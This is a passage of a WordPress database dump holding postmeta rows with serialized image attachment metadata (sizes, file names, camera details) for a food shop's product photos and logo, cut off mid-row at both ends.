:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"Icecream-pineapplefw-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"Icecream-pineapplefw-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:33:\"Icecream-pineapplefw-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"Icecream-pineapplefw-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:34:\"Icecream-pineapplefw-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"Icecream-pineapplefw-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"Icecream-pineapplefw-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1465486623\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12487,2070,'_edit_lock','1586425792:1'),(12488,2070,'_edit_last','1'),(12489,2070,'_wp_page_template','default'),(12492,2070,'rs_page_bg_color','#ffffff'),(12493,5017,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12494,2120,'_edit_lock','1586427172:1'),(12495,5018,'_wp_attached_file','2018/01/orange-banana-ready-1300-x-1945-2.jpg'),(12496,5018,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1300;s:6:\"height\";i:1943;s:4:\"file\";s:45:\"2018/01/orange-banana-ready-1300-x-1945-2.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-2-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-2-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:47:\"orange-banana-ready-1300-x-1945-2-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:46:\"orange-banana-ready-1300-x-1945-2-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:47:\"orange-banana-ready-1300-x-1945-2-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:45:\"orange-banana-ready-1300-x-1945-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"1.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552032228\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.002\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12497,2120,'_edit_last','1'),(12498,2120,'_wp_page_template','default'),(12501,2120,'rs_page_bg_color','#ffffff'),(12502,5019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12503,5020,'_wp_attached_file','2018/01/Icecream-pineapple-landscape.jpg'),(12504,5020,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1943;s:6:\"height\";i:1300;s:4:\"file\";s:40:\"2018/01/Icecream-pineapple-landscape.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:41:\"Icecream-pineapple-landscape-1024x685.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:685;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:42:\"Icecream-pineapple-landscape-1536x1028.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1028;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:41:\"Icecream-pineapple-landscape-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:41:\"Icecream-pineapple-landscape-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:42:\"Icecream-pineapple-landscape-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-600x401.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:401;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:40:\"Icecream-pineapple-landscape-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"2.8\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:20:\"Canon EOS 5D Mark II\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1465486623\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"105\";s:3:\"iso\";s:3:\"320\";s:13:\"shutter_speed\";s:17:\"0.033333333333333\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12507,2144,'_edit_lock','1586426494:1'),(12508,5021,'_wp_attached_file','2018/01/new-pesto-for-web.jpg'),(12509,5021,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1325;s:6:\"height\";i:1980;s:4:\"file\";s:29:\"2018/01/new-pesto-for-web.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"new-pesto-for-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-201x300.jpg\";s:5:\"width\";i:201;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"new-pesto-for-web-685x1024.jpg\";s:5:\"width\";i:685;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"new-pesto-for-web-768x1148.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1148;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"new-pesto-for-web-1028x1536.jpg\";s:5:\"width\";i:1028;s:6:\"height\";i:1536;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"new-pesto-for-web-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"new-pesto-for-web-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:31:\"new-pesto-for-web-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"new-pesto-for-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-600x897.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:897;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"new-pesto-for-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"3.2\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552205941\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"200\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12510,2144,'_edit_last','1'),(12511,2144,'_wp_page_template','default'),(12514,2144,'rs_page_bg_color','#ffffff'),(12515,5022,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(12516,5023,'_wp_attached_file','2018/01/Banana-bread-new-smallish.jpg'),(12517,5023,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1978;s:6:\"height\";i:1324;s:4:\"file\";s:37:\"2018/01/Banana-bread-new-smallish.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-600x402.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-300x201.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:201;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:38:\"Banana-bread-new-smallish-1024x685.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:685;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-768x514.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:514;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:39:\"Banana-bread-new-smallish-1536x1028.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1028;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:38:\"Banana-bread-new-smallish-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:38:\"Banana-bread-new-smallish-550x1100.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:39:\"Banana-bread-new-smallish-1100x1100.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:1100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-600x402.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:402;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:37:\"Banana-bread-new-smallish-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:14:\"Canon EOS 200D\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:10:\"1552034460\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:2:\"50\";s:3:\"iso\";s:3:\"400\";s:13:\"shutter_speed\";s:6:\"0.0125\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12520,5025,'_wp_attached_file','2020/04/Logo-New-TR-web.jpg'),(12521,5025,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1223;s:6:\"height\";i:360;s:4:\"file\";s:27:\"2020/04/Logo-New-TR-web.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"Logo-New-TR-web-300x88.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:88;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1024x301.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:301;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-768x226.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:226;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-550x360.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:28:\"Logo-New-TR-web-1100x360.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:360;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:27:\"Logo-New-TR-web-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-600x177.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:27:\"Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(12522,2745,'_wp_old_slug','tr-little-logo'),(12523,5002,'_wp_old_slug','logo'),(12524,5002,'_edit_lock','1586432604:1'),(12525,5002,'portfolio_single_masonry_image_size',''),(12526,5002,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12527,5002,'_edit_last','1'),(12528,5002,'_wp_page_template','default'),(12529,4921,'_wp_old_slug','tr-little-logo-recovered'),(12530,4921,'_edit_lock','1586432389:1'),(12531,4921,'portfolio_single_masonry_image_size',''),(12532,4921,'image_gallery_masonry_image_size','qodef-default-masonry-item'),(12533,4921,'_edit_last','1'),(12534,4921,'_wp_page_template','default'),(12535,566,'_wp_old_slug','logo-tr-for-news-lett'),(12536,664,'_edit_lock','1586454896:1'),(12537,5026,'_wp_attached_file','2020/04/small-Logo-New-TR-web.jpg'),(12538,5026,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:177;s:4:\"file\";s:33:\"2020/04/small-Logo-New-TR-web.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"small-Logo-New-TR-web-300x89.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:89;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-550x177.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"small-Logo-New-TR-web-550x177.jpg\";s:5:\"width\";i:550;s:6:\